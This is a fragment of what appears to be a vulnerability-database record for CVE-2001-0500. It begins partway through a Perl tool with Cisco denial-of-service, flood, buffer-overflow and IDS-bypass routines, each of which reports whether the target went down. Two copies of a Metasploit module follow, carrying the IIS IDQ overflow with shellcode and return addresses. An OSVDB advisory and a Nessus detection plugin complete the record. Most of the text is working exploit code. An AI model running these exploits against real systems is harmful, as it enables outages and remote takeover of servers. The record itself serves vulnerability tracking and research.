: \";\r\n $k = <STDIN>;\r\n chomp ($k);\r\n if ($k eq \"\")\r\n {$vuln = \"GET /exec/show/config/cr HTTP/1.0\\n\\n\";}\r\n else\r\n {$vuln = \"GET /exec$k HTTP/1.0\\n\\n\";}\r\n\r\n my $sockd = IO::Socket::INET->new (\r\n PeerAddr => $serv,\r\n PeerPort => $port,\r\n Proto => \"tcp\")\r\n || die \"No http server detected on $serv ...\\n\\n\";\r\n\r\n print \"Packet sent ...\\n\";\r\n print $sockd \"$vuln\";\r\n sleep(2);\r\n print \"\\nServer response :\\n\\n\";\r\n while (<$sockd>){print}\r\n close($sockd);\r\n exit(1);\r\n}\r\n\r\nsub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability\r\n{\r\n my $serv = $host;\r\n my $port = 80;\r\n my $vuln = \"GET /error?/ HTTP/1.0\\n\\n\";\r\n\r\n my $sockd = IO::Socket::INET->new (\r\n PeerAddr => $serv,\r\n PeerPort => $port,\r\n Proto => 
\"tcp\")\r\n || die \"No http server detected on $serv ...\\n\\n\";\r\n\r\n print \"Packet sent ...\\n\";\r\n print $sockd \"$vuln\";\r\n sleep(2);\r\n print \"\\nServer response :\\n\\n\";\r\n while (<$sockd>){print}\r\n close($sockd);\r\n exit(1);\r\n}\r\n\r\nsub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability\r\n{\r\n my $ip = $host;\r\n my $port = \"514\";\r\n my $ports = \"\";\r\n my $size = \"\";\r\n my $i = \"\";\r\n my $string = \"%%%%%XX%%%%%\";\r\n\r\n print \"Input packets size : \";\r\n $size = <STDIN>;\r\n chomp($size);\r\n\r\n socket(SS, PF_INET, SOCK_DGRAM, 17);\r\n my $iaddr = inet_aton(\"$ip\");\r\n\r\n for ($i=0; $i<10000; $i++)\r\n { send(SS, $string, $size, sockaddr_in($port, $iaddr)); }\r\n\r\n printf \"\\nPackets sent ...\\n\";\r\n sleep(2);\r\n printf \"Please enter a server's open port : \";\r\n $ports = <STDIN>;\r\n chomp $ports;\r\n printf \"\\nNow checking server status ...\\n\";\r\n sleep(2);\r\n\r\n socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die \"An error occuring while loading socket ...\\n\\n\";\r\n my $dest = sockaddr_in ($ports, inet_aton($ip));\r\n connect (SO, $dest) || die \"Vulnerability successful exploited. Target server is down ...\\n\\n\";\r\n\r\n printf \"Vulnerability unsuccessful exploited. Target server is still up ...\\n\\n\";\r\n exit(1);\r\n}\r\n\r\nsub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\r\n{\r\n my $ip = $host;\r\n my $vln = \"%%%%%XX%%%%%\";\r\n my $num = 30000;\r\n my $string .= $vln x $num;\r\n my $shc=\"\\015\\012\";\r\n\r\n my $sockd = IO::Socket::INET->new (\r\n Proto => \"tcp\",\r\n PeerAddr => $ip,\r\n PeerPort => \"(2002)\",\r\n ) || die \"Unable to connect to $ip:2002 ...\\n\\n\";\r\n\r\n $sockd->autoflush(1);\r\n print $sockd \"$string\" . 
$shc;\r\n while (<$sockd>){ print }\r\n print \"Packet sent ...\\n\";\r\n close($sockd);\r\n sleep(1);\r\n print(\"Now checking server's status ...\\n\");\r\n sleep(2);\r\n\r\n my $sockd2 = IO::Socket::INET->new (\r\n Proto=>\"tcp\",\r\n PeerAddr=>$ip,\r\n PeerPort=>\"(2002)\",);\r\n unless ($sockd){die \"Vulnerability successful exploited. Target server is down ...\\n\\n\"};\r\n\r\n print(\"Vulnerability unsuccessful exploited. Target server is still up ...\\n\\n\");\r\n exit(1);\r\n}\r\n\r\nsub cisco11 # Cisco Catalyst Memory Leak Vulnerability\r\n{\r\n my $serv = $host;\r\n my $rep = \"\";\r\n my $str = \"AAA\\n\";\r\n\r\n print \"\\nInput the number of repetitions : \";\r\n $rep = <STDIN>;\r\n chomp $rep;\r\n \r\n my $sockd = IO::Socket::INET->new (\r\n PeerAddr => $serv,\r\n PeerPort => \"(23)\",\r\n Proto => \"tcp\")\r\n || die \"No telnet server detected on $serv ...\\n\\n\";\r\n\r\n for ($k=0; $k<=$rep; $k++) {\r\n print $sockd \"$str\";\r\n sleep(1);\r\n print $sockd \"$str\";\r\n sleep(1);\r\n }\r\n close($sockd);\r\n print \"Packet sent ...\\n\";\r\n sleep(1);\r\n print(\"Now checking server's status ...\\n\");\r\n sleep(2);\r\n \r\n my $sockd2 = IO::Socket::INET->new (\r\n Proto=>\"tcp\",\r\n PeerAddr=>$serv,\r\n PeerPort=>\"(23)\",);\r\n unless ($sockd2){die \"Vulnerability successful exploited. Target server is down ...\\n\\n\"};\r\n\r\n print \"Vulnerability unsuccessful exploited. Target server is still up after $rep logins ...\\\\n\";\r\n close($sockd2);\r\n exit(1);\r\n}\r\n\r\nsub cisco12 # Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability\r\n{\r\n my $serv = $host;\r\n my $l =100;\r\n my $vuln = \"\";\r\n my $long = \"A\" x $l;\r\n\r\n my $sockd = IO::Socket::INET->new (\r\n PeerAddr => $serv,\r\n PeerPort => \"(80)\",\r\n Proto => \"tcp\")\r\n || die \"No http server detected on $serv ...\\n\\n\";\r\n\r\n for ($k=0; $k<=50; $k++) {\r\n my $vuln = \"GET \" . $long . 
\" HTTP/1.0\\n\\n\";\r\n print $sockd \"$vuln\\n\\n\";\r\n sleep(1);\r\n $l = $l + 100;\r\n }\r\n\r\n close($sockd);\r\n print \"Packet sent ...\\n\";\r\n sleep(1);\r\n print(\"Now checking server's status ...\\n\");\r\n sleep(2);\r\n\r\n my $sockd2 = IO::Socket::INET->new (\r\n Proto=>\"tcp\",\r\n PeerAddr=>$serv,\r\n PeerPort=>\"http(80)\",);\r\n unless ($sockd2){die \"Vulnerability successful exploited. Target server is down ...\\n\\n\"};\r\n\r\n print \"Target is not vulnerable. Server is still up after 5 kb of buffer ...)\\n\";\r\n close($sockd2);\r\n exit(1);\r\n}\r\n\r\nsub cisco13 # %u Encoding IDS Bypass Vulnerability (UTF)\r\n{\r\n my $serv = $host;\r\n my $vuln = \"GET %u002F HTTP/1.0\\n\\n\";\r\n\r\n my $sockd = IO::Socket::INET->new (\r\n PeerAddr => $serv,\r\n PeerPort => \"(80)\",\r\n Proto => \"tcp\")\r\n || die \"No http server detected on $serv ...\\n\\n\";\r\n\r\n print \"Packet sent ...\\n\";\r\n print $sockd \"$vuln\";\r\n close($sockd);\r\n sleep(1);\r\n print(\"Now checking server's status ...\\n\");\r\n print(\"Please verify if directory has been listed ...\\n\\n\");\r\n print(\"Server response :\\n\");\r\n sleep(2);\r\n while (<$sockd>){ print }\r\n exit(1);\r\n}\r\n\r\nsub cisco14 # Cisco IOS HTTP server DoS Vulnerability\r\n{\r\n my $serv = $host;\r\n my $vuln = \"GET /TEST?/ HTTP/1.0\";\r\n\r\n my $sockd = IO::Socket::INET->new (\r\n Proto=>\"tcp\",\r\n PeerAddr=>$serv,\r\n PeerPort=>\"http(80)\",);\r\n unless ($sockd){die \"No http server detected on $serv ...\\n\\n\"};\r\n\r\n print $sockd \"$vuln\\n\\n\";\r\n print \"Packet sent ...\\n\";\r\n close($sockd);\r\n sleep(1);\r\n print(\"Now checking server's status ...\\n\");\r\n sleep(2);\r\n\r\n my $sockd2 = IO::Socket::INET->new (\r\n Proto=>\"tcp\",\r\n PeerAddr=>$serv,\r\n PeerPort=>\"http(80)\",);\r\n unless ($sockd2){die \"Vulnerability successful exploited. Target server is down ...\\n\\n\"};\r\n\r\n print(\"Vulnerability unsuccessful exploited. 
Target server is still up ...\\n\\n\");\r\n close($sockd2);\r\n exit(1);\r\n}\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20933/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-2001-0500"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Microsoft IIS. The 'idq.dll' library fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request containing an overly long argument to Internet Data Administration (.ida) and Internet Data Query (.idq) files, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.\n## Short Description\nA remote overflow exists in Microsoft IIS. The 'idq.dll' library fails to perform proper bounds checking resulting in a buffer overflow. 
With a specially crafted request containing an overly long argument to Internet Data Administration (.ida) and Internet Data Query (.idq) files, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://www.microsoft.com/\nOther Advisory URL: http://www.eeye.com/html/research/advisories/AD20010618.html\n[Nessus Plugin ID:10695](https://vulners.com/search?query=pluginID:10695)\n[Nessus Plugin ID:10713](https://vulners.com/search?query=pluginID:10713)\nMicrosoft Security Bulletin: MS01-033\nKeyword: Code Red\nKeyword: IDQ\nISS X-Force ID: 6705\nGeneric Informational URL: http://oval.mitre.org/oval/definitions/pseudo/OVAL197.html\n[CVE-2001-0500](https://vulners.com/cve/CVE-2001-0500)\nCIAC Advisory: l-098\nCERT: CA-2001-13\nBugtraq ID: 2880\n", "modified": "2001-06-18T00:00:00", "published": "2001-06-18T00:00:00", "id": "OSVDB:568", "href": "https://vulners.com/osvdb/OSVDB:568", "title": "Microsoft IIS idq.dll IDA/IDQ ISAPI Remote Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:26", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Microsoft IIS 5.0 IDQ Path Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0500"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:82956", "href": "https://packetstormsecurity.com/files/82956/Microsoft-IIS-5.0-IDQ-Path-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. 
\n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft IIS 5.0 IDQ Path Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in the IDQ ISAPI handler for \nMicrosoft Index Server. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2001-0500'], \n[ 'OSVDB', '568'], \n[ 'MSB', 'MS01-033'], \n[ 'BID', '2880'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 800, \n'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\", \n'StackAdjustment' => -3500, \n}, \n \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows 2000 Pro English SP0', { 'Ret' => '0x6e8f3e24' } ], \n[ 'Windows 2000 Pro English SP1-SP2', { 'Ret' => '0x6e8f8cc4' } ], \n], \n'DisclosureDate' => 'June 18 2001', \n'DefaultTarget' => 0)) \n \nregister_options([Opt::RPORT(80)], self.class) \n \nend \n \ndef exploit \nconnect \n \nsploit = rand_text_alphanumeric(1) + \".idq?\" + rand_text_alphanumeric(232) \nsploit << \"%u06eb.%u\" + target.ret[-4, 4] + \"%u\" + target.ret[-8, 4] \nsploit << \".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=\" \nsploit << rand_text_alphanumeric(1) + \" HTTP/1.0\\r\\n\\r\\n\" + rand_text_alphanumeric(46) \n \nuri = '/' + sploit + payload.encoded \n \nres = \"GET #{uri}\\r\\n\\r\\n\" \n \nprint_status(\"Trying target #{target.name}...\") \n \nsock.put(res) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82956/ms01_033_idq.rb.txt"}], "metasploit": [{"lastseen": "2020-05-22T06:18:09", "description": "This module exploits a stack buffer 
overflow in the IDQ ISAPI handler for Microsoft Index Server.\n", "published": "2006-09-13T06:20:05", "type": "metasploit", "title": "MS01-033 Microsoft IIS 5.0 IDQ Path Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0500"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/IIS/MS01_033_IDQ", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS01-033 Microsoft IIS 5.0 IDQ Path Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the IDQ ISAPI handler for\n Microsoft Index Server.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2001-0500'],\n [ 'OSVDB', '568'],\n [ 'MSB', 'MS01-033'],\n [ 'BID', '2880'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\n 'StackAdjustment' => -3500,\n },\n\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows 2000 Pro English SP0', { 'Ret' => '0x6e8f3e24' } ],\n [ 'Windows 2000 Pro English SP1-SP2', { 'Ret' => '0x6e8f8cc4' } ],\n ],\n 'DisclosureDate' => 'Jun 18 2001',\n 'DefaultTarget' => 0))\n\n register_options([Opt::RPORT(80)])\n end\n\n def exploit\n connect\n\n sploit = rand_text_alphanumeric(1) + \".idq?\" + rand_text_alphanumeric(232)\n sploit << \"%u06eb.%u\" + target.ret[-4, 4] + \"%u\" + target.ret[-8, 4]\n sploit << \".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=\"\n sploit << rand_text_alphanumeric(1) + \" HTTP/1.0\\r\\n\\r\\n\" + rand_text_alphanumeric(46)\n\n uri = '/' + sploit + payload.encoded\n\n res = \"GET #{uri}\\r\\n\\r\\n\"\n\n 
print_status(\"Trying target #{target.name}...\")\n\n sock.put(res)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/iis/ms01_033_idq.rb"}], "canvas": [{"lastseen": "2019-05-29T17:19:28", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0500"], "description": "**Name**| ms01_033 \n---|--- \n**CVE**| CVE-2001-0500 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| IIS 5.0 Index Server ISAPI (.ida) Overflow \n**Notes**| CVE Name: CVE-2001-0500 \nVENDOR: Microsoft \nMSADV: MS01-033 \nVersionsAffected: \nRepeatability: \nReferences: http://www.microsoft.com/technet/security/bulletin/MS01-033.mspx \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0500 \nDate public: 06/18/01 \nCVSS: 10.0 \n\n", "edition": 2, "modified": "2001-07-21T04:00:00", "published": "2001-07-21T04:00:00", "id": "MS01_033", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms01_033", "title": "Immunity Canvas: MS01_033", "type": "canvas", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T03:16:33", "description": "There's a buffer overflow in the remote web server through\nthe ISAPI filter.\n \nIt is possible to overflow the remote web server and execute \ncommands as user SYSTEM.\n\nAdditionally, other vulnerabilities exist in the remote web\nserver since it has not been patched.", "edition": 27, "published": "2001-06-19T00:00:00", "title": "Microsoft IIS ISAPI Filter Multiple Vulnerabilities (MS01-044)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0500", "CVE-2001-0506", "CVE-2001-0544", "CVE-2001-0507", "CVE-2001-0545", "CVE-2001-0508"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:microsoft:iis"], "id": "IIS_ISAPI_OVERFLOW.NASL", "href": 
"https://www.tenable.com/plugins/nessus/10685", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# This script was written by Renaud Deraison <deraison@cvs.nessus.org>\n# It was modified by H D Moore to not crash the server during the test\n#\n# Supercedes MS01-033\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(10685);\n script_version (\"1.51\");\n script_cve_id( \"CVE-2001-0544\", \"CVE-2001-0545\", \"CVE-2001-0506\", \"CVE-2001-0507\", \"CVE-2001-0508\", \"CVE-2001-0500\");\n script_bugtraq_id(2690, 2880, 3190, 3193, 3194, 3195);\n script_xref(name:\"MSFT\", value:\"MS01-033\");\n script_xref(name:\"MSFT\", value:\"MS01-044\");\n script_xref(name:\"MSKB\", value:\"294774\");\n script_xref(name:\"MSKB\", value:\"297860\");\n script_xref(name:\"MSKB\", value:\"298340\");\n script_xref(name:\"MSKB\", value:\"300972\");\n script_xref(name:\"MSKB\", value:\"301625\");\n script_xref(name:\"MSKB\", value:\"304867\");\n script_xref(name:\"MSKB\", value:\"305359\");\n\n script_name(english:\"Microsoft IIS ISAPI Filter Multiple Vulnerabilities (MS01-044)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"There's a buffer overflow in the remote web server through\nthe ISAPI filter.\n \nIt is possible to overflow the remote web server and execute \ncommands as user SYSTEM.\n\nAdditionally, other vulnerabilities exist in the remote web\nserver since it has not been patched.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-033\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-044\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the patches from the bulletins above.\" );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS01-033 Microsoft IIS 5.0 IDQ Path Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2001/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2001/06/18\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2001/05/06\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:iis\");\nscript_end_attributes();\n\n\n script_summary(english:\"Tests for a remote buffer overflow in IIS\");\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.\");\n script_dependencie(\"find_service1.nasl\", \"http_version.nasl\", \"www_fingerprinting_hmap.nasl\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n# The attack starts here\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\nb = get_http_banner(port: port);\nif (\"IIS\" >!< h ) exit(0);\n \n \nw = http_send_recv3(method: \"GET\", port: port,\n item: \"/x.ida?\"+crap(length:220, 
data:\"x\")+\"=x\");\nif (isnull(w)) exit(1, \"the web server did not answer\");\nr = strcat(w[0], w[1], '\\r\\n', w[2]);\n\n # 0xc0000005 == \"Access Violation\"\n if (\"0xc0000005\" >< r)\n {\n security_hole(port);\n }\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
